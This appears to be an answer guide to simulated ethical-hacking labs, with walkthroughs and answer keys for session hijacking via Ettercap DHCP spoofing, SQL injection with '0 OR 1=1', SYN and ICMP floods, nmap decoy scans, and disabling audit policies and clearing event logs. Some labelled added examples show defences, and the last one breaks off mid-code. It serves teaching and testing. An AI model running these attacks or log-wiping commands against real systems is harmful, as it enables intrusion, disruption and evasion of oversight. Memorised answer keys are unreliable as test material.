On Exec, release and renew the IP address assigned by DHCP.
•
Log in to the rmksupplies.com employee portal using the
following credentials:
o
Username:
bjackson
o
Password:
$uper$ecret1
•
On Consult-Lap2, copy the session ID detected in Ettercap.
•
On Consult-Lap, go to rmksupplies.com and use the cookie
editor plug-in to inject the session ID cookie.
•
Verify that you have hijacked the session.
Your Performance
Your Score: 6 of 6 (100%)
Pass Status:
Pass
Elapsed Time: 5 minutes 5 seconds
Required Score: 100%
Task Summary
Required Actions
Use ssh -X to connect to the remote computer
Launch an MITM attack
On Exec, release and renew the IP address
Inject the session ID into a cookie
Hijack the session
Login to the rmksupplies Employee Portal
Explanation
In this lab, your task is to complete the following:
•
On Consult-Lap2, use
ssh -X
to connect to your rogue computer using the following
parameters:
o
IP address:
192.168.0.251
o
Password:
$uper$neaky
•
Use Ettercap and the following parameters to launch a DHCP spoofing man-in-the-
middle attack on your rogue computer and attempt to capture any unsecure passwords:
o
Network Interface:
enp2s0
o
Netmask:
255.255.255.0
o
DNS Server IP address:
192.168.0.11
•
On Exec, release and renew the IP address assigned by DHCP.
•
Log in to the rmksupplies.com employee portal using the following credentials:
o
Username:
bjackson
o
Password:
$uper$ecret1
•
On Consult-Lap2, copy the session ID detected in Ettercap.
•
On Consult-Lap, go to rmksupplies.com and use the cookie editor plug-in to inject the
session ID cookie.
•
Verify that you have hijacked the session.
Complete this lab as follows:
1.
From Consult-Lap2, connect to your rogue computer as follows:
a.
From the Favorites bar, open Terminal.
b.
At the prompt, type
ssh -X 192.168.0.251
and press
Enter
.
c.
For the password, type
$uper$neaky
and press
Enter
.
You are now connected to Rogue1.
2.
Use Ettercap to launch a DHCP spoofing man-in-the-middle attack as follows:
a.
At the prompt, type
ettercap
and press
Enter
to launch Ettercap remotely.
Ettercap is running on the remote computer, but you see the screen locally.
b.
Select
Sniff
.
c.
Select
Unified sniffing
.
d.
From the Network Interface drop-down list, select
enp2s0
.
e.
Click
OK
.
f.
Select
Mitm
.
g.
Select
DHCP spoofing
.
h.
In the Netmask field, enter
255.255.255.0
.
i.
In the DNS Server IP field, enter
192.168.0.11
.
j.
Click
OK
.
3.
On Exec, release and renew the IP address as follows:
a.
From top navigation tabs, select
Buildings
.
b.
Under Building A, select
Floor 1
.
c.
Under Executive Office, select
Exec
.
d.
Right-click
Start
and select
Windows PowerShell (Admin)
.
e.
Type
ipconfig /release
and press
Enter
to release the currently assigned
addresses.
f.
Type
ipconfig /renew
and press
Enter
to request a new IP address from the
DHCP server.
4.
Log into the rmksupplies.com employee portal as follows:
a.
From the taskbar, open Chrome.
b.
Maximize the window for easier viewing.
c.
In the URL field, enter
rmksupplies.com
and press
Enter
.
d.
At the bottom of the page, select
Employee Portal
.
e.
In the Username field, enter
bjackson
.
f.
In the Password field, enter
$uper$ecret1
.
g.
Select
Login
.
You are logged in as Blake Jackson.
5.
On Consult-Lap2, copy the session ID detected in Ettercap as follows:
a.
From the top navigation tabs, select
Building A
.
b.
Under Red Cell, select
Consult-Lap2
.
c.
In the Ettercap console, find bjackson's
username
,
password
, and
session
cookie
(.login) captured in Ettercap.
d.
Highlight the
session ID
.
e.
Press
Ctrl
+
C
to copy.
6.
On Consult-Lap, go to rmksupplies.com and use the cookie editor plug-in to inject the
session ID cookie as follows:
a.
From the top navigation tabs, select
Building A
.
b.
Under Red Cell, select
Consult-Lap
.
c.
From the taskbar, open Chrome.
d.
Maximize the window for easier viewing.
e.
In Chrome's URL field, enter
rmksupplies.com
.
f.
Press
Enter
.
g.
In the top right corner, select
cookie
to open the cookie editor.
h.
At the top, select the plus
+
sign to add a new session cookie.
i.
In the Name field, enter
.login
j.
In the Value field, press
Ctrl
+
V
to paste in the session cookie you copied
from Ettercap.
k.
Make sure
rmksupplies.com
appears in the Domain field.
l.
Select the
green check mark
to save the cookie.
m.
Click outside the cookie editor to close the editor.
n.
At the bottom of the rmksupplies page, select
Employee Portal
.
You are now on Blake Jackson's web session on your external computer.
QUESTION 4:
You are the penetration tester for a small corporate network. You have
decided to see how secure your online bank's web page is.
In this lab, your task is to perform a simple SQL injection attack on
MySecureOnlineBank.com using the following information:
•
Make an account query for account number
90342
.
•
Perform a simple SQL attack using
0 OR 1=1
.
•
Answer the questions.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 1 second
Required Score: 100%
Task Summary
Lab Questions
Q1
What is your account balance?
Q2
What is the account number of Nisha Dickson?
Explanation
In this lab, your task is to perform a simple SQL injection attack on MySecureOnlineBank.com using
the following information:
•
Make an account query for account number
90342
.
•
Perform a simple SQL attack using
0 OR 1=1
.
•
Answer the questions.
Complete this lab as follows:
1.
From the taskbar, open Chrome.
2.
Maximize the window for easier viewing.
3.
In the URL field, type
mysecureonlinebank.com
4.
Press
Enter
.
5.
In the Enter your Account Number field, enter
90342
.
6.
Select
Lookup
.
The account balance is $582.29.
7.
In the top right, select
Answer Questions
.
8.
Answer question 1.
9.
In the Enter your Account Number field, enter
0 OR 1=1
for the SQL injection.
10.
Select
Lookup
.
11.
Answer question 2.
12.
Select
Score Lab
.
Lab Questions:
1.
What is your account balance?
a.
$582.29
2.
What is Nisha Dickson’s account number?
a.
90003
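Why `0 OR 1=1` returns every account, as an added example that is not the lab site's code: the lookup query built by string concatenation, next to the parameterized form that treats the field as data. The table layout, function names and every row value other than the balance and account number quoted in the lab answers are assumptions.

```python
import sqlite3

SELECT = "SELECT number, owner, balance FROM accounts WHERE number = "


def make_db():
    """In-memory stand-in for the bank's account table (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE accounts (number INTEGER PRIMARY KEY, owner TEXT, balance REAL)"
    )
    db.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [
            (90342, "Lab User", 582.29),        # balance from the lab answer; owner made up
            (90003, "Nisha Dickson", 1204.10),  # number from the lab answer; balance made up
            (90117, "Sample Customer", 77.00),  # entirely constructed
        ],
    )
    return db


def lookup_vulnerable(db, account_field):
    """Concatenates the form field into the SQL text, so the field can alter the query."""
    # With "0 OR 1=1" the statement becomes: ... WHERE number = 0 OR 1=1
    # The second condition is true for every row, so the WHERE clause filters nothing.
    return db.execute(SELECT + account_field).fetchall()


def lookup_parameterized(db, account_field):
    """Validates the field, then binds it as a value that is never parsed as SQL."""
    text = account_field.strip()
    if not (text.isascii() and text.isdigit()):
        raise ValueError("account number must contain digits only")
    return db.execute(SELECT + "?", (int(text),)).fetchall()


def compare(account_field):
    """Run both lookups on the same input and report how many rows each returns."""
    db = make_db()
    leaked = lookup_vulnerable(db, account_field)
    try:
        safe = lookup_parameterized(db, account_field)
        rejected = False
    except ValueError:
        safe, rejected = [], True
    return {"vulnerable_rows": len(leaked), "safe_rows": len(safe), "rejected": rejected}


if __name__ == "__main__":
    for field in ("90342", "0 OR 1=1"):
        print(repr(field), compare(field))
```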
QUESTION 5:
You are the CorpNet IT administrator. Your support team says that
CorpNet's customers are unable to browse to the public-facing web
server. You suspect that it might be under some sort of denial-of-
service attack, possibly a TCP SYN flood attack. Your www_stage
computer is on the same network segment as your web server, so
you'll use this computer to investigate the problem.
In this lab, your task is to:
•
Capture packets from the network segment on www_stage using
Wireshark.
•
Analyze the attack using the following filters:
o
tcp.flags.syn==1 and tcp.flags.ack==1
o
tcp.flags.syn==1 and tcp.flags.ack==0
•
Answer the question.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 44 seconds
Required Score: 100%
Task Summary
Lab Questions
Filter for SYN and ACK packets
Q1
What indicates that this is a distributed denial-of-service (DDoS) attack?
Explanation
In this lab, your task is to:
•
Capture packets from the network segment on www_stage using Wireshark.
•
Analyze the attack using the following filters:
o
tcp.flags.syn==1 and tcp.flags.ack==1
o
tcp.flags.syn==1 and tcp.flags.ack==0
•
Answer the question.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
From the menu, select the
blue fin
to begin the capture.
4.
In the Apply a display filter field, type
tcp.flags.syn==1 and tcp.flags.ack==1
and
press
Enter
to filter the Wireshark display to only those packets with both the SYN flag
and ACK flag.
You may have to wait several seconds before any SYN-ACK packets are captured and
displayed.
5.
Select the
red square
to stop the capture.
6.
In the Apply a display filter field, change the tcp.flags.ack ending from
1
to
0
and
press
Enter
to filter the Wireshark display to packets with only the SYN flag.
Notice that there is a flood of SYN packets being sent to 128.28.1.1 (www.corpnet.xyz)
that are not being acknowledged.
7.
In the top right, select
Answer Questions
.
8.
Answer the question.
9.
Select
Score Lab
.
Lab Questions:
1.
What indicates that this is a distributed denial-of-service (DDoS) attack?
a.
There are multiple source addresses for the SYN packets with the
destination address 128.28.1.1.
QUESTION 6:
As the IT administrator for a small corporate network, you want to
know how to find and recognize a TCP SYN flood attack. You know
you can do this using the Wireshark packet analyzer and a Linux tool
named hping3.
In this lab, your task is to use Wireshark to capture and analyze TCP
SYN flood attacks as follows:
•
Filter captured packets to show TCP SYN packets for the
enp2s0 interface.
•
Use
hping3
to launch a SYN flood attack against
rmksupplies.com using Terminal.
•
Examine a SYN packet with the destination address of
208.33.42.28 after capturing packets for a few seconds.
•
Answer the question.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 2 minutes 38 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Filter SYN packets
Launch an hping3 flood
Q1
For the packet selected, what is the hex value for Flags?
Explanation
In this lab, your task is to use Wireshark to capture and analyze TCP SYN flood attacks as follows:
•
From Kali Linux, start a capture in Wireshark for the esp20 interface.
•
Use
hping3
to launch a SYN flood attack against rmksupplies.com using Terminal.
•
Examine a SYN packet with the destination address of 208.33.42.28 after capturing
packets for a few seconds.
•
Answer the question.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
Select the
blue fin
to begin a Wireshark capture.
4.
In the Apply a display filter field, type
tcp.flags.syn==1
and press
Enter
.
5.
From the Favorites bar, open Terminal.
6.
At the prompt, type
hping3 --syn --flood rmksupplies.com
and press
Enter
to start a
TCP SYN flood against the CorpDC domain controller.
7.
After a few seconds of capturing packets, select the
red box
to stop the Wireshark
capture.
8.
In the top pane of Wireshark, select one of the
packets
captured with a destination
address of 208.33.42.28.
9.
In the middle pane of Wireshark, expand
Transmission Control Protocol
.
10.
Scroll down to Flags.
Notice that both Flags in this pane and the Info column in the top pane show this as a
SYN packet.
11.
In the top right, select
Answer Questions
.
12.
Answer the question.
13.
Click
Score Lab
.
Lab Questions:
1.
For the packet selected, what is the hex value for Flags?
a.
0x002
QUESTION 7:
As the IT security administrator for a small corporate network, you
need to simulate a SYN flood attack using Metasploit so you can
complete a penetration test.
In this lab, your task is to perform and monitor a SYN flood attack
using the following information:
•
Use Zenmap to find the FTP port on CorpServer (192.168.0.10).
•
Use Metasploit to send a SYN flood attack as follows:
o
Remote host:
192.168.0.10
o
Source host:
192.168.0.33
o
Set the FTP port to match the FTP port used by
CorpServer.
•
Use Wireshark to capture the SYN flood on the enp2s0 network
interface.
•
Filter to show only TCP SYN packets.
•
Find the MAC address of the computer causing the SYN flood.
•
Answer the questions.
Your Performance
Your Score: 5 of 5 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 2 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Use Zenmap/nmap to scan ports
Started syn flood using Metasploit
Filtered for SYN attack using Wireshark
Q1
What is the source IP address of the SYN flood attack?
Q2
Which of the following MAC addresses is initiating the SYN flood attack?
Explanation
In this lab, your task is to perform and monitor a SYN flood attack using the following information:
•
Use Zenmap to find the FTP port on CorpServer (192.168.0.10).
•
Use Metasploit to send a SYN flood attack as follows:
o
Remote host:
192.168.0.10
o
Source host:
192.168.0.33
o
Set the FTP port to match the FTP port used by CorpServer.
•
Use Wireshark to capture the SYN flood on the enp2s0 network interface.
•
Filter to show only TCP SYN packets.
•
Find the MAC address of the computer causing the SYN flood.
•
Answer the questions.
Complete this lab as follows:
1.
From Zenmap, use nmap to find the FTP port used on CorpServer as follows:
a.
From the Favorites bar, open Zenmap.
b.
In the Command field, type
nmap -p 0-100 192.168.0.10
c.
Select
Scan
.
CorpServer is using port 21 for FTP.
d.
Close Zenmap.
2.
Use Metasploit to send a SYN flood as follows:
a.
From the Favorites bar, open Metasploit Framework.
b.
At the prompt, type
search synflood
and press
Enter
to find a SYN flood
Metasploit module.
c.
Type
use auxiliary/dos/tcp/synflood
and press
Enter
to select the SYN
flood module.
d.
Type
show options
and press
Enter
to view the current options for the SYN
flood module.
Notice that RHOST and SHOST are unassigned and RPORT is set to port 80.
e.
Type
set rhost 192.168.0.10
and press
Enter
to set the RHOST address.
f.
Type
set shost 192.168.0.33
and press
Enter
to set the SHOST address.
g.
Type
set rport 21
and press
Enter
to set the FTP port.
h.
Type
show options
and press
Enter
to view the new options for the SYN
flood module.
Notice that RHOST and SHOST have IP addresses assigned and RPORT is set
to port 21 matching CorpServer.
3.
Capture SYN flood attacks on the CorpServer machine as follows:
a.
From the Favorites bar, open Wireshark.
b.
Under Capture, select
enp2s0
.
c.
In the Apply a display filter field, type
host 192.168.0.10 and
tcp.flags.syn==1
d.
Press
Enter
.
e.
Select the
blue fin
to begin a Wireshark capture.
Notice that no packets are being captured.
4.
In Metasploit, type
exploit
and press
Enter
to start a SYN flood.
5.
Capture packets for a few seconds.
6.
In Wireshark, select the
red box
to stop the Wireshark capture.
Notice the time between each packet sent to host 192.168.1.10. Notice that only SYN
packets were captured.
7.
In the top right, select
Answer Questions
.
8.
Answer question 1.
9.
In the middle pane, expand
Ethernet II
.
Notice the source MAC address of the computer sending the SYN flood.
10.
Answer question 2.
11.
Select
Score Lab
.
Lab Questions:
1.
What is the source IP address of the SYN flood attack?
a.
192.168.0.33
2.
Which of the following MAC addresses is initiating the SYN flood attack?
a.
00:60:98:7F:41:E0 (IT-Laptop)
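The display filters used in Questions 5 to 7 reduce to a comparison a script can make: SYN-only packets sent to a service versus the SYN-ACKs it returns, plus the number of distinct sources. This added example is not from the lab and applies that logic to raw IPv4/TCP headers. The packets, thresholds, verdict labels and function names are assumptions constructed for illustration.

```python
import socket
import struct
from collections import defaultdict

SYN, ACK = 0x002, 0x010   # TCP flag bits; a bare SYN shows in Wireshark as Flags: 0x002


def build_packet(src, dst, sport, dport, flags):
    """IPv4 + TCP headers only, checksums left at zero. Constructed test data."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40, 0, 0, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    tcp = struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 1024, 0, 0)
    return ip + tcp


def parse_tcp(packet):
    """Return (src, dst, sport, dport, flags), or None if not a usable IPv4/TCP packet."""
    if len(packet) < 20 or packet[0] >> 4 != 4 or packet[9] != 6:
        return None
    ihl = (packet[0] & 0x0F) * 4          # IPv4 header length in bytes
    if ihl < 20 or len(packet) < ihl + 14:
        return None
    sport, dport = struct.unpack("!HH", packet[ihl:ihl + 4])
    flags = struct.unpack("!H", packet[ihl + 12:ihl + 14])[0] & 0x0FFF
    return (socket.inet_ntoa(packet[12:16]), socket.inet_ntoa(packet[16:20]),
            sport, dport, flags)


def summarize(packets, min_syns=20, max_answer_ratio=0.5):
    """Per (destination, port): SYN-only count, SYN-ACKs sent back, distinct sources."""
    syn_only = defaultdict(int)
    sources = defaultdict(set)
    syn_ack = defaultdict(int)
    for raw in packets:
        parsed = parse_tcp(raw)
        if parsed is None:
            continue
        src, dst, sport, dport, flags = parsed
        if flags & SYN and not flags & ACK:      # tcp.flags.syn==1 and tcp.flags.ack==0
            syn_only[(dst, dport)] += 1
            sources[(dst, dport)].add(src)
        elif flags & SYN and flags & ACK:        # tcp.flags.syn==1 and tcp.flags.ack==1
            syn_ack[(src, sport)] += 1           # reply counted against the service
    report = {}
    for key, count in syn_only.items():
        answered = syn_ack.get(key, 0)
        flood = count >= min_syns and answered / count <= max_answer_ratio
        if not flood:
            verdict = "normal"
        elif len(sources[key]) > 1:
            verdict = "distributed-syn-flood"
        else:
            verdict = "syn-flood"
        report[key] = {"syn": count, "syn_ack": answered,
                       "sources": len(sources[key]), "verdict": verdict}
    return report


def sample_capture():
    """Constructed traffic: a flood toward 128.28.1.1:80 and ordinary FTP connections."""
    packets = []
    # 40 SYNs from 40 different sources (documentation address range), mostly unanswered.
    for i in range(1, 41):
        packets.append(build_packet(f"203.0.113.{i}", "128.28.1.1", 40000 + i, 80, SYN))
    for i in (1, 2):
        packets.append(build_packet("128.28.1.1", f"203.0.113.{i}", 80, 40000 + i, SYN | ACK))
    # Three ordinary connections to 192.168.0.10:21, each SYN answered with a SYN-ACK.
    for i in range(3):
        packets.append(build_packet("192.168.0.33", "192.168.0.10", 50000 + i, 21, SYN))
        packets.append(build_packet("192.168.0.10", "192.168.0.33", 21, 50000 + i, SYN | ACK))
    packets.append(b"\x45\x00")               # truncated frame, skipped by the parser
    return packets


if __name__ == "__main__":
    for target, stats in summarize(sample_capture()).items():
        print(target, stats)
```

Source IP addresses in a flood can be forged, as the settable SHOST option in Question 7 shows, so on a local segment the Ethernet source MAC is the more reliable identifier.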
QUESTION 8:
You are the IT administrator for a small corporate network, and you
want to know how to find and recognize an ICMP flood attack. You
know that you can do this using Wireshark and hping3.
In this lab, your task is to create and examine the results of an ICMP
flood attack as follows:
•
From Kali Linux, start a capture in Wireshark for the esp20
interface.
•
Ping CorpDC at 192.168.0.11.
•
Examine the ICMP packets captured.
•
Use hping3 to launch an ICMP flood attack against CorpDC.
•
Examine the ICMP packets captured.
•
Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 5 minutes 9 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Filter for ICMP packets
Run ping
Run hping3 for ICMP flood
Q1
What is the main difference between a normal icmp (ping) request and an icmp flood?
(Select TWO).
Explanation
In this lab, your task is to create and examine the results of an ICMP flood attack as follows:
•
From Kali Linux, start a capture in Wireshark for the esp20 interface.
•
Ping CorpDC at 192.168.0.11.
•
Examine the ICMP packets captured.
•
Use hping3 to launch an ICMP flood attack against CorpDC.
•
Examine the ICMP packets captured.
•
Answer the questions.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
Select the
blue fin
to begin a Wireshark capture.
4.
From the Favorites bar, open Terminal.
5.
At the prompt, type
ping 192.168.0.11
and press
Enter
.
6.
After some data exchanges, press
Ctrl
+
c
to stop the ping process.
7.
In Wireshark, select the
red box
to stop the Wireshark capture.
8.
In the Apply a display filter field, type
icmp
and press
Enter
.
Notice the number of packets captured and the time between each packet being sent.
9.
Select the
blue fin
to begin a new Wireshark capture.
10.
In Terminal, type
hping3 --icmp --flood 192.168.0.11
and press
Enter
to start a ping
flood against CorpDC.
11.
In Wireshark, select the
red box
to stop the Wireshark capture.
Notice the type, number of packets, and the time between each packet being sent.
12.
In Terminal, type
Ctrl
+
c
to stop the ICMP flood.
13.
In the top right, select
Answer Questions
.
14.
Answer the questions.
15.
Select
Score Lab
.
Lab Questions:
1.
What was the main difference between the normal icmp (ping) request and the
icmp flood? (select TWO.)
a.
With the icmp flood, icmp packets are sent more rapidly.
b.
With the flood, all packets come from the source.
QUESTION 9:
You are an ethical hacker consultant working for CorpNet. They want
you to discover weaknesses in their network. From outside of the
CorpNet network, you found their web server, www.corpnet.xyz, has
an IP address of 198.28.1.1. You decide to perform several nmap
scans using a few http scripts.
In this lab, your task is to run the following nmap scripts on port 80 of
198.28.1.1:
•
http-server-header.nse to display the HTTP server header.
•
http-chrono.nse to measure the time a website takes to deliver a
web page.
•
http-headers.nse to perform a HEAD request for the root folder.
•
http-errors.nse to crawl through the website and return any error
pages.
•
http-malware-host.nse to look for malware signatures of known
server compromises.
•
http-comments-displayer.nse to display HTML and JavaScript
comments.
Your Performance
Your Score: 9 of 9 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 8 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Display the HTTP server header
Q1
Which software is used by www.corpnet.com to offer the HTTP service?
Measure the time a website takes to deliver a web page
Perform a HEAD request for the root folder
Crawl through the website and return any error pages
Q2
How many error pages were found?
Look for the malware signatures of known server compromises
Display HTML and JavaScript comments
Q3
What is the last comment listed on line 20 of the web page at http://www.corpnet.xyz:80?
Explanation
In this lab, your task is to run the following nmap scripts on port 80 of 198.28.1.1:
•
http-server-header.nse to display the HTTP server header.
•
http-chrono.nse to measure the time a website takes to deliver a web page.
•
http-headers.nse to perform a HEAD request for the root folder.
•
http-errors.nse to crawl through the website and return any error pages.
•
http-malware-host.nse to look for malware signatures of known server compromises.
•
http-comments-displayer.nse to display HTML and JavaScript comments.
Complete this lab as follows:
1.
From the Favorites bar, open Terminal.
2.
At the prompt, type
nmap --script=http-server-header -p80 198.28.1.1
and
press
Enter
to run the http-server-header.nse script.
3.
In the top right, select
Answer Questions
.
4.
Answer question 1.
5.
Type
nmap --script=http-chrono -p80 198.28.1.1
and press
Enter
to run the http-
chrono.nse script.
6.
Type
nmap --script=http-headers -p80 198.28.1.1
and press
Enter
to run the http-
headers.nse script.
7.
Type
nmap --script=http-errors -p80 198.28.1.1
and press
Enter
to run the http-
errors.nse script.
8.
Under Lab Questions, answer question 2.
9.
Type
nmap --script=http-malware-host -p80 198.28.1.1
and press
Enter
to run the
http-malware-host.nse script.
10.
Type
nmap --script=http-comments-displayer -p80 198.28.1.1
and press
Enter
to run
the http-comments-displayer.nse script.
11.
Under Lab Questions, answer question 3.
12.
Click
Score Lab
.
Lab Questions:
1.
Which software is used by
www.corpnet.xyz
to offer the HTTP service?
a)
Apache 2.4.7.
2.
How many error pages were found?
a)
0
3.
What is the last comment listed on line 20 of the web page at
http://www.corpnet.xyz:80
?
a)
<!--END Google Analytics Code-- >
QUESTION 10:
You are a cybersecurity consultant. The company hiring you suspects
that employees are connecting to a rogue access point (AP). You
need to find the name of the hidden rogue AP so it can be
deauthorized. The computer suspected of using the rogue access
point is Exec-Laptop.
In this lab, your task is to complete the following:
•
On IT-Laptop, use
airmon-ng
to put the wireless adapter in
monitor mode.
•
Use
airodump-ng
to find the hidden access point.
•
On Exec-Laptop, connect to the rogue AP using the CoffeeShop
SSID.
•
Answer the question.
Your Performance
Your Score: 3 of 3 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 29 seconds
Required Score: 100%
Task Summary
Required Actions & Questions
Set the wlp1s0 wireless adapter to monitor mode
Find the hidden access point
Q1
What is the BSSID of the rogue access point?
Explanation
In this lab, your task is to complete the following:
•
On IT-Laptop, use
airmon-ng
to put the wireless adapter in monitor mode.
•
Use
airodump-ng
to find the hidden access point.
•
On Exec-Laptop, connect to the rogue AP using the CoffeeShop SSID.
•
Answer the question.
Complete this lab as follows:
1.
On IT-Laptop, configure the wlp1s0 card to run in monitor mode as follows:
a.
From the Favorites bar, open Terminal.
b.
At the prompt, type
airmon-ng
and press
Enter
to find the name of the
wireless adapter.
c.
Type
airmon-ng start wlp1s0
and press
Enter
to put the adapter in monitor
mode.
d.
Type
airmon-ng
and press
Enter
to view the new name of the wireless
adapter.
2.
Use airodump-ng to discover and isolate the hidden access point as follows:
a.
Type
airodump-ng wlp1s0mon
and press
Enter
to discover all of the access
points.
b.
Press
Ctrl
+
c
to stop airodump-ng.
c.
Find the hidden access point ESSID
<length : 0>
.
d.
In the top right, select
Answer Questions
.
e.
Answer the question.
f.
In Terminal, type
airodump-ng wlp1s0mon --bssid
bssid_number
and
press
Enter
to isolate the hidden access point.
3.
Switch to the Exec-Laptop and connect to the Wi-Fi network as follows:
a.
From the top navigation tabs, select
Floor 1 Overview
.
b.
Under Executive Office, select
Exec-Laptop
.
c.
From the notification area, select the
Wi-Fi network
icon.
d.
Select
Hidden Network
.
e.
Select
Connect
.
f.
In the Enter the name (SSID) for the network field, type
CoffeeShop
.
In a real environment, you'll only need to wait until the employee connects to
the rogue access point again.
g.
Select
Next
.
h.
Select
Yes
.
i.
Under Lab Questions, select
Score Lab
.
QUESTION 11:
You work for a penetration testing consulting company. You need to
make sure that you can't be identified by the intrusion detection
systems. Use nmap to perform a decoy scan on CorpNet.local.
In this lab, your task is to use nmap to perform a decoy scan on
enp2s0 and to use Wireshark to see the results.
•
Use Wireshark to capture packets on the
enp2s0
network
interface.
•
Use nmap to perform a decoy scan targeting the
192.168.0.31
IP
address using
10
random IP addresses.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status:
Pass
Elapsed Time: 1 minute 44 seconds
Required Score: 100%
Task Summary
Required Actions
Perform a decoy scan
Explanation
In this lab, your task is to use nmap to perform a decoy scan on enp2s0 and to use Wireshark to see
the results.
•
Use Wireshark to capture packets on the
enp2s0
network interface.
•
Use nmap to perform a decoy scan targeting the
192.168.0.31
IP address
using
10
random IP addresses.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
In the upper left menu, select the
blue fin
to start a scan.
4.
From the Favorites bar, open Terminal.
5.
At the prompt, type
nmap -D RND:10 192.168.0.31
and press
Enter
.
6.
Maximize the window for easier viewing.
7.
In Wireshark, scroll down until you see
192.168.0.31
in the Destination column.
8.
Under Source, view the different IP addresses used to disguise the scan.
QUESTION 12:
As the IT security specialist for your company, you're performing a
penetration test to verify email security. You are specifically concerned
that the HR department may be sending employees' personally
identifiable information (PII) in clear text through emails.
In this lab, your task is to:
•
Capture packets on the enp2s0 interface using Wireshark.
•
Find packets containing the following information using display
filters:
o
Social security numbers (SSN)
o
Birth dates
o
Direct deposit routing numbers
o
Mother's maiden name
o
Favorite car
o
Favorite movie
“
You can use the
tcp contains
desired_information
filter.
”
•
Answer the questions.
Your Performance
Your Score: 4 of 4 (100%)
Pass Status:
Pass
Elapsed Time: 4 minutes 55 seconds
Required Score: 100%
Task Summary
Lab Questions
Q1
What is George Hanks' Social Security number?
Q2
What is Steven Joffer's favorite car?
Q3
How many packets contain Social Security numbers?
Q4
What is the 9-digit bank routing number for Julia?
Explanation
In this lab, your task is to:
•
Capture packets on the enp2s0 interface using Wireshark.
•
Find packets containing the following information using display filters:
o
Social security numbers (SSN)
o
Birth dates
o
Direct deposit routing numbers
o
Mother's maiden name
o
Favorite car
o
Favorite movie
•
Answer the questions.
Complete this lab as follows:
1.
From the Favorites bar, open Wireshark.
2.
Under Capture, select
enp2s0
.
3.
Select the
blue fin
to begin a Wireshark capture.
4.
After a few seconds, select the
red box
to stop the Wireshark capture.
5.
In the Apply a display filter field, type
tcp contains SSN
and press
Enter
.
6.
In the top right, select
Answer Questions
.
7.
In the bottom pane of Wireshark, examine the packet information to answer the
questions.
8.
Answer the questions.
9.
Select
Score Lab
.
Lab Questions:
1.
What is George Hanks' Social Security number?
a.
111-00-5555
2.
What is Steven Joffer’s favorite car?
a.
Aston Martin
3.
How many packets contain Social Security numbers?
a.
2
4.
What is the 9-digit bank routing number for Julia?
a.
999912341
A.2.4 Pro Domain 4: Cover Up
QUESTION 1:
You are a cybersecurity consultant and have been asked to work with
the ACME, Inc. company to ensure their network is protected from
hackers. As part of the tests, you need to disable logging on a
Windows system.
In this lab, your task is to use Windows PowerShell (as Admin) to:
•
View the current audit policies on the system.
•
Disable all audit policies.
•
Confirm that all the audits were disabled.
Your Performance
Your Score: 1 of 1 (100%)
Pass Status:
Pass
Elapsed Time: 3 minutes 7 seconds
Required Score: 100%
Task Summary
Required Actions
Disable all audit policies
Explanation
In this lab, your task is to use Windows PowerShell (as Admin) to:
•
View the current audit policies on the system.
•
Disable all audit policies.
•
Confirm that all the audits were disabled.
Complete this lab as follows:
1.
Right-click
Start
and select
Windows PowerShell (Admin)
.
2.
Maximize the window for easier viewing.
3.
At the command prompt, type
auditpol /get /category:*
and press
Enter
to view the
current audit policies.
Notice the different settings used for each system.
4.
Type
auditpol /clear /y
and press
Enter
to disable all audit policies.
5.
Type
auditpol /get /category:*
and press
Enter
to confirm that the audits were
disabled.
Notice that all of the polices are now set to No Auditing.
QUESTION 2:
You are a cybersecurity consultant and have been asked to work with
the ACME, Inc. company to ensure that their network is protected from
hackers. As part of the tests, you need to clear a few log files.
In this lab, your task is to use Windows PowerShell (as Admin) to
clear the following event logs:
• Use get-eventlog to view the available event logs.
• Use clear-eventlog to clear the Application and System logs.
Your Performance
Your Score: 2 of 2 (100%)
Pass Status: Pass
Elapsed Time: 1 minute 56 seconds
Required Score: 100%
Task Summary
Required Actions
Application log cleared
System log cleared
Explanation
In this lab, your task is to use Windows PowerShell (as Admin) to clear the following event logs:
• Use get-eventlog to view the available event logs.
• Use clear-eventlog to clear the Application and System logs.
Complete this lab as follows:
1. Right-click Start and select Windows PowerShell (Admin).
2. Maximize the window for easier viewing.
3. At the prompt, type Get-Eventlog -logname * and press Enter. In the Entries column, notice the number of entries for the logs.
4. Type Clear-Eventlog -logname Application and press Enter.
5. Type Clear-Eventlog -logname System and press Enter.
6. Type Get-Eventlog -logname * and press Enter. The Application log now shows zero entries. The System log shows one entry because another event occurred between the time you cleared the log and the time you viewed the entry list.
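The two Cover Up labs above, seen from the monitoring side: a change to the audit policy and the clearing of an event log each leave a record of their own (Security 4719 and 1102, System 104). This is an added example, not part of the TestOut lab; the function names Find-LogTampering and Test-TamperBurst and the sample records are constructed.

```powershell
# Added example, not part of the lab. Function names and sample records are
# constructed; the event IDs are the standard Windows ones.
$TamperSignatures = @{
    'Security/4719' = 'System audit policy was changed'
    'Security/1102' = 'Security audit log was cleared'
    'System/104'    = 'An event log was cleared'
}

function Find-LogTampering {
    [CmdletBinding()]
    param(
        # Any object with LogName, Id, TimeCreated and Message properties,
        # which is the shape Get-WinEvent returns.
        [Parameter(Mandatory, ValueFromPipeline)]
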